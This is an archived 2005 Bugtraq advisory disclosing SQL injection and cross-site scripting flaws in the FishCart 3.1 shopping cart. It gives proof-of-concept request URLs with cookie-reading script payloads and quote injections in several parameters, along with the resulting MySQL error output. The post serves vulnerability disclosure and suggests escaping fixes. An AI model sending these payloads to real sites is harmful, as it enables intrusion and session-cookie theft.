| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 4 May 2005 03:10:28 -0000 From: dcrab <dcrab@...kerscenter.com> To: bugtraq@...urityfocus.com Subject: Multiple SQL injections and XSS in FishCart 3.1 Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah ***SPECIAL OFFER*** Hire my auditing services, if I dont find anything, its FREE..!! http://www.digitalparadox.org/services.ah Looking for Publishers intrested in my Php Secure Coding Book. Severity: High Title: Multiple SQL injections and XSS in FishCart 3.1 Date: 4/05/2005 Vendor: FishNet Inc Vendor Website: http://www.fishnetinc.com Summary: There are, multiple sql injections and xss in fishcart 3.1. Proof of Concept Exploits: http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku= XSS http://example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION SQL INJECTION Database error: Invalid SQL: select count(*) as cnt from cvsdemo31prod,cvsdemo31prodlang where nzid=1 and nprodsku=prodsku and prodzid=1 and nprodsku=prodlsku and prodlzid=1 and prodlid=1prodsku='''SQL_INJECTION' and prodlsku='''SQL_INJECTION' and prodzid=1 and prodzid=prodlzid and prodlid=1 and (produseinvq=0 or (produseinvq=1 and prodinvqty>0)) MySQL Error: 1054 (Unknown column 'nzid' in 'where clause') Session halted. http://example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION SQL INJECTION Database error: Invalid SQL: select sku,qty from cvsdemo31oline where orderid=''SQL_INJECTION' MySQL Error: 1064 (You have an error in your SQL syntax near 'SQL_INJECTION'' at line 1) Session halted. http://example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m= XSS http://example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m= XSS http://example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script> XSS Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/.
Powered by blists - more mailing lists